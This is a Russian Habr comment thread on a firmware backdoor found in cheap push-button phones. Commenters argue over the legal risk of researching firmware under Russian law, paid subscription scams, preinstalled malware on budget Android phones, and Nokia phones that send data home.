                      Был включён. Я вообще отключил/запретил на телефоне всё что там можно было касающееся интернета.

                      Кстати, ValdikSS, Вам Nokia 8110 4G на растерзание не нужен?


                      1. flashmozzg
                        08.09.2021 22:27

                        Я вообще отключил/запретил на телефоне всё что там можно было касающееся интернета.

                        Мб только для интернета 4G отключил. Нужно было вообще запретить (мб на той Нокии не отключался, а только предпочтение можно было отдать, там вроде не Андроид, а что-то своё).


        1. Maccimo
          03.09.2021 01:34
          +7

          рекламная статейка запугивает обывателей, что есть только один чистый бренд

          Если эта статья — реклама, то автора нужно номинировать на каннского льва или хотя бы на Effie.


      1. ifap
        01.09.2021 13:00
        +6

        Списание денег со счета абонента — это и будет вредоносная активность, т.к. материальный ущерб налицо, ст.273 УК РФ. Сложности могут возникнутьс с квалификацией по ст.272, т.к. где там охраняемая законом информация — бабка надвое сказала, не видя содержания исходящей SMS/http сказать сложно. Если надумаете — обращайтесь, поможем подготовить обращения в инстанции.


        1. wataru
          01.09.2021 13:55

          С таким маленьким ущербом наши органы шевелиться не будут.


          1. ifap
            01.09.2021 14:20
            +2

            По 273-й ущерб не обязателен.


        1. zxosa
          02.09.2021 05:37

          а может подготовите типовое заявление в прокуратуру? я пока схожу телефон куплю и распаковывать не буду.


          1. ifap
            02.09.2021 11:39
            +3

            Как Вы видите такое заявление? Я, имярек, купил телефон Х, а внутри — обнаружил малварь! Прилагаю к заявлению нераспакованный телефон? ;) И причем тут прокуратура?


      1. somarov
        02.09.2021 12:11

        Этот «бабушкофон» шёл из магазина с «чистой», обновлённой прошивкой. В интернете для этой модели была найдена одна единственная версия "IRBIS_SF63_GC9106_CTC_V05_GSM_FM_20181010.pac", которая и была установлена на устройство. Она оказалась с бекдором.

        То есть Вы зачем-то, где-то, скачали прошивку с бекдором, вопрос зачем? Если в магазине вам дали "чистый" телефон ?


        1. ValdikSS Автор
          02.09.2021 12:20
          +3

          Это первая версия прошивки, от 10 октября 2018. Я скачал и установил её для исследования и подтверждения вредоносной активности. Телефоны с этой прошивкой поставлялись в магазины — я связался с человеком из статьи на tjournal, он подтвердил, что не перепрошивал и ничего дополнительного не делал со своим телефоном, а купил его уже с бэкдором. Мой телефон из магазина шёл с обновлённой версией прошивки от 21 ноября 2019.

          На всех других аппаратах прошивки не менялись.

          Отзыв о телефоне в DNS от 23.11.2019:

          Использует 2G трафик. Если в тарифе не предусмотрен пакет трафика, то счет за интернет будет неприятным сюрпризом. Служба поддержки Irbis на этот счет молчит.

          Отзыв от 17.05.2019:

          […] Самостоятельно выходит в интернет. […]


          1. Lepidozavr
            06.09.2021 16:04

            Если мы говорим про исследование для целей правового восстановления справедливости, это бы нам не помогло.


      1. Smashrock
        22.09.2021 15:03
        +1

        В ФСБ уже написал. Ответили, что информация будет использоваться в оперативной работе - мда, хз, что бы это значило. Попросил добавить ещё домен, который вы нашли, в некоторые чёрные листы доменов.


        Спасибо вам, что обнаружили и написали про это!!


    1. pvp
      01.09.2021 09:55
      +6

      Скорее, 272/273 возбудят на топикстартера за "несанкционированный доступ" к прошивкам телефонов. :) Это не шутка, прецеденты были.


      1. RiddickABSent
        01.09.2021 11:23
        -14

        И будут)

        Нужно было остановиться на детализации, что сообщение ушло.


      1. vikarti
        01.09.2021 11:34
        +4

        Или за имитатор базовой для перехвата. Лицензии на частоты же нет.


        1. KislyFan
          04.09.2021 02:54

          Мощность такого оборудования измеряется в милливатах, этого хватит максимум на реализацию "hot spot", чтобы телефон мог закемпиться на сектор. Никакой хоть сколько-нибудь ощутимой интерференции это не создаст.

          И кстати OpenBTS и его форки это вполне себе полноценная базовая станция по 3GPP с одним сектором и одним передатчиком. На оффсайте можно посмотреть кейсы с примерами успешного коммерческого использования.


      1. hedger
        01.09.2021 14:18
        +6

        Есть ст. 1280 ГК РФ, в которой описаны кейсы, когда можно легально выполнять обратную разработку ПО. Кейс автора подтягивается под них.


        1. pvp
          01.09.2021 17:03
          +4

          Ментам это расскажите, которые такие дела возбуждают. И судьям, которые рассматривают.


          1. KislyFan
            04.09.2021 02:55
            +1

            Примеры дел есть? Фамилии, Имена, предьявленные обвинения, решения судов?


            1. pvp
              04.09.2021 16:32

              1. KislyFan
                05.09.2021 14:19
                +1

                Неубедительно. Чипирование и кряки это все таки пиратство.


                1. pvp
                  08.09.2021 20:05

                  "Пиратство" -- это ст. 146 УК, а не 272


                  1. tormozedison
                    08.09.2021 21:42

                    А обход DRM (ТСЗАП) — вполне 272.


                    1. Popadanec
                      09.09.2021 10:34

                      Или 273 создание программ для обхода. Турьма.


              1. tormozedison
                05.09.2021 17:12
                +1

                Там обход DRM на чужом устройстве за вознаграждение. За это в любой стране мира привлечь могут. У вас же случай сложный. С одной стороны, поиск малвари — 1280 в чистом виде. Любой антивирус, в конце концов, то же самое и делает. С другой — если припомнят пираченный Miracle Box, технически окажутся правы.


                1. pvp
                  08.09.2021 20:09

                  И что? В данном случае 272/273 статьи вменяются именно за изменение прошивки устройства, выполненное его хозяином или по просьбе хозяина. Никакой разницы -- телефон или приставка, в данном случае нет. Были массовые дела именно за телефоны в середине двухтысячных: https://mobile-review.com/articles/2005/turma.shtml Но сейчас просто двигают этот процесс представители производителей прошивок, которые заинтересованы в "борьбе с пиратством".


                  1. tormozedison
                    08.09.2021 21:45

                    Разница в цели. Обход DRM запрещён — значит, доступ к компьютерной информации был неправомерным. Смена IMEI запрещена — аналогично. Даже без смены IMEI замена прошивки на другую версию — откуда она? До AOSP'а в 2005 году ох, как далеко было, опенсорсных прошивок вообще не существовало — пираченная, стало быть. А поиск малвари разрешён (1280), и этим занимается любой антивирус — доступ правомерный.

                    А ещё когда ту статью писали, телефоны ещё были предметами сертификации вместе с прошивкой. Хоть один байт отличался от эталонного — телефон считался более несертифицированным — пользоваться запрещено.


                    1. pvp
                      11.09.2021 11:44

                      "Обход DRM" -- это гражданский деликт, предусмотренный ст. 1299 ГК. С "доступом к информации" он не имеет ничего общего. Вообще, закон об информации и ГК4Ч регулируют разные правоотношения, которые друг с другом не пересекаются. Подмена "доступа к информации" на действия с произведением, охраняемым АП -- это, собственно, основа такой вот натяжки совы на глобус и фабрикации 272/273.

                      "Смена IMEI запрещена — аналогично" -- каким нормативным актом она запрещена?

                      "опенсорсных прошивок вообще не существовало — пираченная, стало быть" -- если прошивка "пираченная", претензии должен предъявлять правообладатель, а не дядя мент.


                      1. tormozedison
                        11.09.2021 12:03

                        В 2005 году телефоны были объектами сертификации вместе с ПО. FOTA (если бы тогда уже была) — нельзя. «Эльфы для Сименсов» — нельзя, но всем было пофиг. JAR и SIS — под вопросом, ибо несертифицированный код на подлежащем сертификации телефоне, а это был большой бизнес. Из-за которого, вероятно, сертификацию телефонов и ПО для них и отменили. И да, если в наши дни подшаманить прошивку ККМ или электросчётчика, последствия будут как в 2005-м с телефоном.

                        Для 146 нужно преодолеть порог ущерба. Раньше был 50 тысяч, теперь 100, если потом ещё не поднимали. Для 272 же — всё сходится. Информация — да. Компьютерная — да. Доступ — да. Неправомерный — да (обход DRM, пираченная прошивка, «рассертификация», когда это было ещё важно, и т.п.). А если поиск малвари — то на трёх входах этого элемента «И» — единицы, на четвёртом — нуль, так как 1280, и доступ правомерный. Антивирус на Android тоже гуляет по всей файловой системе, в т.ч. read-only областям. Если вредонос в прошивке, а рута нет — не исправит, но гаркнет всё равно. В кнопчном то же самое, но антивирус некуда ставить. Разница исключительно в том, что исследование происходит снаружи.

                        Но! Программа Miracle Box — ДСП. По замыслу разработчиков, она не должны была выйти за пределы телефоносборочного завода. А вышла, и доступ к ней — 272.

                        Это как обезвредить маньяка, догнав его на машине без номеров.


                      1. pvp
                        11.09.2021 15:27

                        Сертификация -- это подтверждение соответствия определенным требованиям. Каким образом сертификация препятствует владельцу устройства изменить его прошивку? Ну, получит он "несертифицированный" телефон, но "неправомерный доступ" откуда тут возьмется? Любой доступ, совершаемый обладателем информации, который, к тому же, еще и оператор ИС -- правомерный по определению.

                        "обход DRM, пираченная прошивка" -- это все запрещено ГК. И не образует "неправомерного доступа". Доступ к информации и обход средств защиты авторских прав -- регулируются разными законами и по разным правилам. Закон об информации все-таки почитайте уже.


                      1. tormozedison
                        11.09.2021 17:43

                        Неправомерный доступ — значит, совершённый при отсутствии права на него. В 272 не сказано, чем определяется наличие или отсутствие такого права. Значит, оно может определяться не только законом «Об информации», но и другим законодательным актом, например, ГК.


                      1. pvp
                        11.09.2021 18:04

                        "Федеральный закон от 27 июля 2006 г. N 149-ФЗ "Об информации, информационных технологиях и о защите информации"

                        Статья 1. Сфера действия настоящего Федерального закона
                        ...
                        2. Положения настоящего Федерального закона не распространяются на отношения, возникающие при правовой охране результатов интеллектуальной деятельности и приравненных к ним средств индивидуализации, за исключением случаев, предусмотренных настоящим Федеральным законом."

                        ГК:
                        "Статья 1259. Объекты авторских прав
                        ...
                        6. Не являются объектами авторских прав:
                        ...
                        4) сообщения о событиях и фактах, имеющие исключительно информационный характер (сообщения о новостях дня, программы телепередач, расписания движения транспортных средств и тому подобное)."

                        Итого: правомерность доступа к информации не может "определяться ГК", у них сферы регулирования разделены.


                      1. tormozedison
                        11.09.2021 18:15

                        Но 272 не ссылается ни на закон «Об информации», ни на ГК, стало быть, наличие или отсутствие права доступа может определяться любым законодательным актом. Вот если прошивка электросчётчика или ККМ подшаманена для обсчёта в пользу владельца, это явно 272.


                      1. pvp
                        11.09.2021 18:22

                        "УК РФ Статья 272. Неправомерный доступ к компьютерной информации"

                        Само название как бы намекает нам, что речь идет об информации, которую ГК не регулирует.


      1. LuggerMan
        01.09.2021 17:03

        реверсить для выявления явных ошибок можно! детализация как повод


    1. Arioch
      02.09.2021 12:05

      "нарушение тайны связи"

      По здравому смыслу (не знаю как по юридическому) - это когда ВАШИ сообщения (СМСки, разговоры и т.д.) читают и передают на сторону.

      В данном же случае телефон от вашего лица (вашего номера) творит отсебятину. НО, ваши разговоры он никуда не передаёт. Тут, в западной терминологии, наверное можно найти identity theft (в случае с "бабушкой Шурой"), но никакого "нарушения тайны" пока не видно.

      Кроме того, а много ли прецедентов, когда за "нарушение тайны" реально преследовали? Ведь интерес в таких прецедентах у правоохранителей отрицательный: им СОРМ и Deep Inspection с Великим Фаерволлом нужнее.


      1. Chamie
        05.09.2021 21:10

        По здравому смыслу (не знаю как по юридическому) — это когда ВАШИ сообщения (СМСки, разговоры и т.д.) читают и передают на сторону.
        Так там же и была пересылка входящих СМС. Для регистрации в мессенджерах, етц.


        1. Arioch
          06.09.2021 11:32

          Интересный аргумент, в самом деле.

          Скользкий вопрос, впрочем, можно ли это считать ВАШИМ сообщением, если оно приходит для меня и по моему запросу, хотя я и использую для своих целей ваш адрес?

          Вот представим себе дропшипперов, которые предоставляют локальный адрес, чтобы из локальных магазинов привозили товары с доставкой, перед их пересылкой "через море". Они же не приобретают права на сами посылки при этом. Теперь представьте, что я как-то вас надурил, и вашим домом пользуюсь как своим складом, бесплатно и без вашего ведома. Даёт ли моё преступление вам право потрошить мои посылки?..


          1. Chamie
            06.09.2021 11:48

            Вот представим себе дропшипперов, которые предоставляют локальный адрес, чтобы из локальных магазинов привозили товары с доставкой, перед их пересылкой «через море». Они же не приобретают права на сами посылки при этом.
            Вообще-то, приобретают. Юридически это либо вы купили им, либо они купили по вашей просьбе. Просто по вашему договору они переуступают права вам. И права их на эти посылки при это ограничиваются только вот этим самым договором между вами и ими. Если вы закажете посылку на посторонний почтовый ящик, то посылка будет принадлежать его владельцу без каких-либо ограничений вообще.


          1. santjagocorkez
            06.09.2021 17:56
            -1

            Скользкий вопрос, впрочем, можно ли это считать ВАШИМ сообщением, если оно приходит для меня и по моему запросу, хотя я и использую для своих целей ваш адрес?

            Будет очень весело. После доказательства в уголовном суде, что никакого нарушения тайны связи не было, потому что сообщение предназначалось не держателю SIM-карты, а обвиняемому, уголовное дело по ст. "Нарушение тайны связи" закрывается... и открывается новое по ст. 273 УК РФ, возможно, в соединении со ст. 272 УК РФ. Причем, материалы предыдущего уголовного дела будут иметь преюдициальную силу, поскольку факты установлены судом (более того, на таковой трактовке фактов настаивал сам привлекаемый по новому УД), решение которого вступило в законную силу.


            1. Arioch
              06.09.2021 20:09

              а разве до того статьи 272/273 уже не было?

              использование спец-программ, чтобы читать ваши СМС и при этом не давать вам про них узнать - это разве не подпадает под "блокирование" из 273

              в общем, хуже уже не будет, но хоть "тайну связи" срезать :-)


              1. santjagocorkez
                07.09.2021 20:42

                Дело в том, что в описанном сценарии, чтобы "отменить" тайну связи, надо фактически сделать явку с повинной, причём, прямо в судебном заседании. Иными словами:

                • 138 и/или 272 и/или 273 и всё это следствию и гособвинителю надо еще доказать (понимаю, что с этим даже при отсутствии фактуры иногда проблем никаких нет)

                • отменить 138 через признание 272 и/или 273, и следствию/гособвинителю уже ничего доказывать не надо, более того, никакой сделки с правосудием или аналогичного принципа из УПК тут даже близко нет, это даже не считается сотрудничеством со следствием

                В общем, какой-то Эскобар, на мой взгляд.


                1. ifap
                  26.10.2021 00:19

                  138 УК (как, впрочем, и 272/273) предполагает прямой умысел, которого в данном случае по 138-й нет, а по 272/273 — есть. Так что перспективу Вы красивую нарисовали, но нереальную.


  1. acc0unt
    01.09.2021 00:03
    +17

    Очередная отличная статья!

    Похоже, что адок дешёвых звонилок - поле воистину непаханное, и братья-китайцы уже давно нашли способы монетизировать бабушек с этими звонилками.

    Подозреваю что в дешёвых китайских телефонах на Android можно найти такой же функционал - только прошивки эти расковыривать одновременно проще и сложнее. Проще потому что девайсы и софт более стандартные, сложнее потому что объём огромен.


    1. ValdikSS Автор
      01.09.2021 00:06
      +8

      Tecno, как и Itel входящий в холдинг Transsion, был замечен за распространением malware на смартфонах: https://www.bbc.com/news/technology-53903436

      Устройства Tecno также продавались в российской рознице. Но вообще, вирусы на смартфонах — классика: https://habr.com/ru/post/418751/comments/#comment_18940873


      1. acc0unt
        01.09.2021 00:37
        +4

        Интересно, какова итоговая доля всей этой дряни во всяких "платная подписка подписалась сама".

        Не умаляю заслуг операторов - само существование этих подписок в 2021 году ничем кроме способа "легального" отъёма денег у населения быть не может. Но скорее всего шума от бэкдоров и прочей дряни хватает чтобы спрятать в нём дичь с автоподписками.


        1. ifap
          01.09.2021 14:23
          -1

          Сложный вопрос, надо же определенную USSD-команду послать или SMS на определенный номер, чтобы подписаться. Какой интерес китайцам давать зарабатывать российским опсосам? Если только «локализованная» при участии местных заинтересованных лиц прошивка.


          1. acc0unt
            01.09.2021 19:44

            Это называется "партнёрка".

            Партнёр оператора, который владеет сервисом подпиской, получает от оператора долю за каждую подписку. А партнёр партнёра, в свою очередь, подпихивает эту подписку людям, и за это тоже имеет долю.

            На то, какими методами в этой цепочке получаются подписки, глаза принято закрывать.


            1. ifap
              01.09.2021 22:24
              +1

              Я знаю, как устрон этот бизнес мошенническая схема, потому и сомневаюсь. Одно дело «вы сами в несознанке нажали» и поди докажи, что нет, другое — вот оно материальное доказательство, которое даже сбросом к заводским не уничтожишь. Да и слишком много сторон придется посвящать, куда проще и безопаснее самому оператору со своими партнерами подельниками подключать «услуги» — вся доказательная база под их контролем, если что — в детализации пусто, абонент бредит.


              1. Arioch
                02.09.2021 12:12

                вот оно материальное доказательство

                Нет у вас никаких доказательств.

                Вы должны доказать, что платная подписка появилась в следствие "[телефон] Обращается к CnC в интернете и выполняет его команды"

                При появлении такого дела или CnC сервер вообще будет погашен для России, или этот телефон будет внесён в чёрный список на нём.

                Запрос на сервер "меня продали!" - да отправляет. Подписываться - не подписывается. Нет такого в прошивке, а CnC ушёл в несознанку.


                1. ifap
                  02.09.2021 12:49

                  А что наведет владельца сервера на такую идею, полиция отправляет уведомление о плановой проверке в рамках расследования?


                  1. Arioch
                    02.09.2021 15:01

                    Кстати, а почем бы и нет? Коррупцию никто не отменял, а "обычный участковый, тысячи их" такую экспертизу сам не сделает.

                    Но - до того, как дело дойдёт до суда, полиция должна будет связаться с магазином, представителем производителя и с оператором тоже. Предполагая, что любой из них может быть "в партнёрке", то до поступления дела в суд - утечка будет. А в суде скажут, что менты доказательства подделали.


                    1. ifap
                      02.09.2021 15:07

                      А суд такой всплеснет руками: ах, подлые менты! Ну, раз вы так говорите, то дело прекращено!


                      1. Arioch
                        02.09.2021 19:02

                        В хорошем суде - да.

                        А в плохом - доказательства вообще не нужны и предмета разговора нет.


                      1. ifap
                        02.09.2021 19:15

                        У нас явно разные представления о хорошем суде.


                      1. Arioch
                        02.09.2021 20:03
                        +1

                        Это не важно. Если для вас хороший суд - это "нет оснований не доверять сотруднику милиции" - пусть так. Результат-то сходный будет: объективных доказательств злонамеренности телефона нет, потому что они просто никому не нужны, а нужны официальные показания милиционера под присягой, что "оно правда так, сам видел".


                      1. ifap
                        02.09.2021 20:58

                        Вы уже какое-то время дискутируете с воображаемым собеседником.


                      1. Arioch
                        02.09.2021 21:40

                        это уже обратный солипсизм какой-то, что я вас выдумал.

                        я всё же пока буду надеяться, что:

                        • вы всё же существуете объективно

                        • в хороших судах требуются объективные доказательства, а не только мнения свидетельские показания полицейских


                      1. ifap
                        03.09.2021 00:22

                        — Я объективно существую, что не мешает Вам успешно выдумывать мои реплики.
                        — В хороших судах — тех, которые аллегорически олицетворяет тетка с весами и повязкой на глазах — объективным будет считаться пласт доказательств, собранных в ходе ОРД, а необъективным — устное заявление обвиняемого: вывсеврети!


                      1. Arioch
                        03.09.2021 01:28

                        доказательств, собранных в ходе ОРД

                        Довольно размытая формулировка. Понятно, если "в ходе ОРД" взяли телефон и положили в сейф - его можно в суде предъявить. Если удалось забрать сервер и положить в сейф - еще лучше. Но на это надежды мало.

                        Остаются по сути свидетельские показания. Я своей честью полицейского/нотариуса клянусь, что когда вон тот очкастый хакер нажимал кнопки, ой отправлял запрос на сервер, на экран выползало, ой, сервер возвращал....

                        После чего истец запрашивает экспертизу и экспертиза показывает, что ничего на самом деле сервер не возвращает.


                    1. leonma
                      02.09.2021 17:08

                      А НОНД и внутренние убеждения судьи - уже не работают?


                      1. ifap
                        02.09.2021 19:16

                        Но ведь у ответчика честные глаза и он хлебом клянется, что вся доказательная база ментов — подлог! /sarcasm off


          1. 3aBulon
            04.09.2021 07:20

            Далеко не всегда. Чаще появляется всплывающее от оператора и одна кнопка ОК, она же подписаться. С плохим зрением очень реально сначала нажмут ОК а потом уже будет поздно.


            1. ifap
              04.09.2021 12:12

              Постойте, мы же говорим лишь о вредоносном коде в телефоне, а не всех существующих сравнительно честных способах отъема денег у граждан опсосами. То, о чем написали Вы — это пуш от оператора, телефону тут ничего делать и не надо.


    1. hollycon
      01.09.2021 07:55
      +1

      Товары с Али. Там даже и в телефоны\планшеты мировых брендов могут имплантировать нежелательное ПО нечистые на руку продаваны.

      Сам удивлялся - а чего это у меня планшет через месяц после покупки наставил разного китайского ПО? После очередного сброса через месяц снова зоопарк. Вылечил прошивкой с 4pda, но это модель была популярная. Как быть с дешевым лютым китаем - неизвестно.

      Полагаю, такое может быть и не только с Андроидом. Любая популярная платформа домашней электроники, камеры например давно уже таковые попадаются. Зачем искать в Сети IoT устройства и заражать их, если можно просто продавать весь этот ботнет?


      1. AlNi89
        01.09.2021 18:07
        +4

        Как быть с дешевым лютым китаем - неизвестно.

        Эм... не покупать его?


        1. leonma
          02.09.2021 17:09
          +2

          Он же дешёвый!!!


          1. barbaris76
            03.09.2021 03:43
            +3

            "Ну, хорошо. Но потом - сжечь!" (с)


      1. Maximuzz
        02.09.2021 19:39

        Однажды, купил серый (закупали на али ) телефон в локальном магазе, mi4c прошка была люто набита поапами со звуком, пока не перепрошил, телефон спокойно ночью не давал спать.


    1. Popadanec
      01.09.2021 12:43
      +2

      Встречал похожее в Fly и Tesla(уж не знаю, имеет ли отношение бренд к Илону Маску). Прошивка заводская, телефоны никогда не прошивались и не разблокировались загрузчики. Даже сторонние приложения не ставились. Через год или полтора после покупки с ними начиналась творится какая то дичь. Похоже срабатывал внутренний таймер и телефон начинал грузить кучу полноэкранной рекламы. Все установленные антивирусы находили кучу вирусов и удаляли их, кроме одного, который висел в прошивке и удалить его без рут прав было нельзя. Сброс, перепрошивка заводской не помогали, реклама начинала грузится почти сразу. Видимо привязана на дату.
      Вопрос решился только установкой альтернативной прошивкой, а потом телефоны были заброшены на полочку ввиду малого размера ОЗУ и флеш памяти.


    1. quwy
      01.09.2021 17:13
      +1

      Самопроизвольная установка всякого шлака на китайфонах с андроидом уже давно в порядке вещей.


    1. dartraiden
      28.09.2021 01:51
      +1

      Подозреваю что в дешёвых китайских телефонах на Android можно найти такой же функционал

      О… Был (и есть) такой производитель третьего эшелона — Doogee. Так вот вирусня в их прошивках (там натурально в SystemUI сидел троян, а ещё несколько маскировались под OTA-сервис и что-то ещё) достигла таких размахов, что сама Google пообещала им проблем, если не прекратят. После чего ВНЕЗАПНО вышли прошивки без вирусов.

      Масштаб можно оценить, посмотрев спойлеры «Инструкции» и «Разное» в этом топике. Чтобы получить «чистую» прошивку, приходилось шить аж 4 разных патча, поскольку говнецо добавлялось и мигрировало из приложения в приложение с каждой новой версией прошивки.

      Ну и Xiaomi. Количество данных, которые они сливают себе, зашкаливает.


  1. Segneto
    01.09.2021 00:11
    +13

    На сколько я знаю, в РФЯЦ ВНИИЭФ и подобных организациях, есть тема с запретом смартфонов, разрешены только кнопочные "звонилки", секретность и все такое. Возможно, скоро эти звонилки научат в тихую записывать звук и отсылать куда надо.


    1. Akito7
      01.09.2021 07:31
      +14

      Не только во ВНИИЭФ. В армии смартофоны запрещены отдельным указом президента. Вот и получается, что тот человек, который разрабатывал этот указ (или приказ МО) сделал большую глупость. Раньше военный знал, что его смартфон лучше никуда не брать т.к. он может выполнять множество мультимедийных функций. Сейчас военный кнопочный телефон берет куда угодно не думая про подобные закладки в ПО телефона, ведь у него есть список разрешенных телефонов.


      1. kaimi_ru
        01.09.2021 08:36
        +4

        Для структур есть отдельная категория устройств - http://stcnet.ru/products_iid_17.htm

        Но насколько там все хорошо с прошивкой - неизвестно.


        1. JerleShannara
          01.09.2021 13:19
          +1

          Там (и у более интересных телефонов) всё хорошо.


    1. Thero
      02.09.2021 00:15

      Кому надо давно научили и сливают куда надо


    1. Lizardinius
      02.09.2021 13:39

      Проходил «стажировку» в одном предприятии где у каждого второго допуск 1 или 2 категории. Там прямо после проходной стоят ячейки, куда можно телефоны складывать (как в супермаркетах только размером с пару смартфонов), и дальше этих ячеек ничего электронного проносить нельзя. Ну де юре нельзя, де факто — пока не поймают можно (а о проверочных рейдах заранее сообщается).
      Так там люди берут звонилки не из-за секретности, а просто потому, что какая разница, что лежит в ячейке, да по вечерам и выходным позвонить иногда, а те, кто правилам не следует, полноценные лопаты с собой носят, главное чтобы из кармана не выпирал.


  1. zhengxi
    01.09.2021 00:27
    +2

    Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности,

    Как вы пришли к такому выводу?

    У меня были подозрения на то, что бабушкин телефон лазает в Интернет (судя по детализации из ЛК оператора; прошивки не копал) и это была именно Nokia


    1. ValdikSS Автор
      01.09.2021 00:31
      +19

      Если Nokia добавит отправку СМС или бекдор в свои устройства, об этом станет известно гораздо быстрее, чем в случае в местечковыми брендами. Покупая устройство бренда, который известен на весь мир, вы с куда большей вероятностью получаете только заявленные функции.

      Читал, что Nokia на KaiOS выходят в интернет (как и другие смартфоны, хоть и кнопочные), но они это делают для синхронизации времени и проверки обновлений ОС.


      1. Syzd
        01.09.2021 08:29
        +3

        Небольшой вопрос, а вы в курсе что Nokia это теперь китайская фирма, одна из.


        1. RomanVZ
          01.09.2021 08:41
          +2

          Причём их современные кнопочные телефоны совершенно отвратительно сделаны и исправлением ошибок они не занимаются.


        1. ValdikSS Автор
          01.09.2021 10:31
          +4

          Конечно, я пишу «бренд», а не «производитель» или «юр. лицо».


      1. Usper
        01.09.2021 18:04
        +1

        Относительно старенькая nokia 130 при первом включении после сброса отправляет сообщение для "активации устройства с приблизительным местоположением вашего устройства". О чём честно предупреждает, но зачем аппарат вообще это делает? Отменить похоже нельзя, в сообщении сказано, что эта информация может быть передана "авторизованным третьим лицам" в т.ч. "в другие страны согласно действующему законодательству".


        1. ValdikSS Автор
          01.09.2021 21:16

          Интересно, в интернете на русском есть только одно упоминание этого сообщения: https://forum.allnokia.ru/viewtopic.php?t=110507&start=360

          Можете сбросить телефон и выбрать английский язык, чтобы посмотреть, как выглядит сообщение на английском?


          1. Usper
            02.09.2021 08:50

            Сообщение выглядит так:

            "Thank you for choosing Nokia. By continuing, a device activation message with a one-time location of the device is sent to Nokia. Sms or data transmission charges may apply. Lern more about privacy in options." В опциях примерно тоже что и на русском о заботе о персональных данных, которые могут быть переданы авторизованным третьим лицам. В этом окне можно только продолжить, посмотреть уверения о заботе о персональных данных (в отдельном окне) или сделать звонок в службы ЧС. Отменить отправку нельзя, на красную кнопку не реагирует. Модель телефона RM-1035.


          1. hqqddy
            02.09.2021 09:53
            +1

            С Нокией (финской еще) были такие приколы еще на Симбиане, при первом включении отправлялась смс, а и да, еще и Nokia N9 на Миго так делала

            https://allnokia.ru/faq/mobile/nokia-n9/

            Как отменить подписку на рассылку Nokia (советы и предложения)?

            Там это твикером можно было отключить (потому что после закрытия бизнеса отключение через настройки уже не работало), а на симбианах тоже рутануть прошивку и отключить, деталей уже не помню. Вроде как и аналитек всея руси (Муртазин) об этом писал в свое время.


            1. hqqddy
              02.09.2021 10:22
              +1

              т.е. это была смс на платный короткий номер. небольшой скандал был по этому поводу. но щас найти сложно подтверждения и описание.


            1. geher
              02.09.2021 21:23

              Nokia N9 на Миго так делала

              Вот не помню за ней такого. У меня было последовательно два таких аппарата. При первом включении ничего не отправлялось. Разве что такое самое первое включение выполнял продавец в порядке предпродажной подготовки.


      1. Taciturn
        01.09.2021 21:33

        Читал, что Nokia на KaiOS выходят в интернет (как и другие смартфоны, хоть и кнопочные), но они это делают для синхронизации времени и проверки обновлений ОС.

        2720 Fold, прошивка 21.00.17.01. Каждые два часа лезет в интернет, проверка обновлений отключена сразу, для теста отключал вообще всё, что можно отключить — в том числе синхронизацию времени — время уползает, лезть в интернет не перестаёт. Если отключить интернет со стороны оператора, то но включить синхронизацию времени, то с временем всё Ok, без всякого интернета.
        На предыдущей прошивке такого не было, от батареи телефон работал дольше. Жалею что обновился, откат не предусмотрен.


    1. DaneSoul
      01.09.2021 09:04
      +1

      У родственника было подобное на Philips E109 — простейшая трубка без интернета, но в биллинге снималось за интернет. В офисе оператора сказали, что интернет запрос уходит при выборе определенных пунктов в меню.


      1. Andzhil
        04.09.2021 20:04

        +1. На телефоне Philips E182 проявилась функция хождения в Инет строго каждый день за какой-то инфой на несколько килобайт. Как выяснилось по итогу, на тарифе без Интернета за это списывалось порядка 2 или 3 руб. в день. Пришлось оформлять подписку на Интернет только ради того, чтобы просто пользоваться телефоном.


        1. DaneSoul
          04.09.2021 20:24
          +1

          Не знаю как у остальных операторов, но на МТС этот родственник бесплатно подключил полный запрет интернета и списания прекратились. Причем, этот запрет можно подключить только в магазине оператора, в интернет кабинете такой опции нет (дело было в прошлом году, сейчас не знаю как работает)!


          1. nlykl
            04.09.2021 21:27

            В личном кабинете нужно не искать запрет, а отключать услугу "Мобильный интернет".


            1. DaneSoul
              04.09.2021 21:45

              Я уже не помню детали, но на тот момент сотрудник магазина МТС сказал что полный запрет можно сделать только у них, через кабинет нельзя.


              1. Popadanec
                05.09.2021 08:45

                Зависит от погоды на Марсе. Временами даже контентный счёт разрешают через ЛК подключать, не то что интернет полностью отключать.


            1. dartraiden
              28.09.2021 02:03

              У Теле2 это именно услуга «Запрет доступа в интернет» и её нужно подключать в личном кабинете.

              Ещё можно позвонить оператору горячей линии и попросить отключить доступ в интернет.

              Я делаю и то, и другое, на всякий случай.


  1. tuxi
    01.09.2021 01:06
    +4

    Я верю, что скоро создадут сообщество, которое будет щедро и часто рассылать фейковые данные на эти сервера…


    1. Alonerover
      02.09.2021 17:28
      +1

      А ведь заDDOS'сить этих паразитов — идея отличная.


      1. axe_chita
        03.09.2021 21:59
        +1

        Поддерживаю, только не заDDOS'сить, а устроить хабраэффект


        1. tormozedison
          05.09.2021 17:18

          Эти домены на Алибабе зарегистрированы, можно туда написать.


          1. axe_chita
            05.09.2021 19:34

            Как вариант пойдет, вот только желательно чтоб перед этим правоохранители «возбудились» и приняли дело к рассмотрению.
            С официальной телегой проще будет.


  1. MikUrrey
    01.09.2021 01:19

    Кстати. Имеется кнопочный телефон Nokia, который включается сам. Выключаешь его в кино перед сеансом, а тут тебе раз - и посреди сеанса звонят. Приходится совсем батарею вынимать.

    Судя по детализации, ничего не отправляет, поэтому больше похоже на глюк прошивки.


    1. ValdikSS Автор
      01.09.2021 01:27
      +2

      Это, наверное, включение и выключение по таймеру — нередкая функция. Использую её на Inoi.


      1. Angeld
        01.09.2021 10:04

        у Nokia и будильник в выключенном состоянии срабатывает


        1. funnycar
          01.09.2021 11:32
          +3

          Так у многих старых телефонов, вроде, были аппаратные часы, которые ходят даже когда телефон отключен.


          1. urix
            01.09.2021 15:16

            Именно так. Я любил делать выключение телефона на ночь и включение его поутру, чтобы никто не звонил (и батарейка экономилась).


            1. Popadanec
              01.09.2021 15:19
              +1

              Смартфоны(по крайней мере некоторые) так же умеют, причём по расписанию. И даже будильник сработает не смотря на то что смартфон выключен.


              1. Arioch
                02.09.2021 12:29

                Даже если включаться по расписанию не может, то смартфон можно в "самолётный режим" переключать.

                Современный Андроид достаточно неплохо отстреливает батарейкопожирателей, а если какой-то из них очень нужен - то есть Island и прочие Working Profile


              1. MikUrrey
                02.09.2021 14:51
                +1

                Включаться по будильнику умели еще самые бюджетные моторолы в 2004-м. Это не какая-то супер-фича смартфона :)


                1. DaemonGloom
                  03.09.2021 10:56

